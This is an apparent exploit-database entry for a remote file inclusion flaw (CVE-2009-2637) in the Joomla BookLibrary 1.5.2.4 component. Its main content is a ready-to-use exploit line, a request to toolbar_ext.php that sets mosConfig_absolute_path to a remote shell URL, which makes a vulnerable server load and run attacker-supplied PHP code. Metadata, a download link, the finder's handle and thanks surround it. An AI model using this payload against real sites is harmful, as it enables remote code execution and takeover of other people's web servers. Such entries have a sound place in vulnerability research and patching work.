Joomla! Component BookLibrary 1.5.2.4 - Remote File Inclusion
Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2009-06-08
date_updated: 2009-06-09
verified: 1
codes: OSVDB-56653;CVE-2009-2637
tags:
aliases:
screenshot_url:
application_url:
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Joomla com_booklibrary_1.5.2.4 Remote File Include
Download: http://ordasoft.com/Download-document/3-BookLibrary-1.5.2.4-Basic.html
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Found: xoron
contact: xorontr@gmail.com (only e-mail)
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Exploit:
-> .../com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=shell?
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Thanx: str0ke, VoLkan
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
# milw0rm.com [2009-06-09]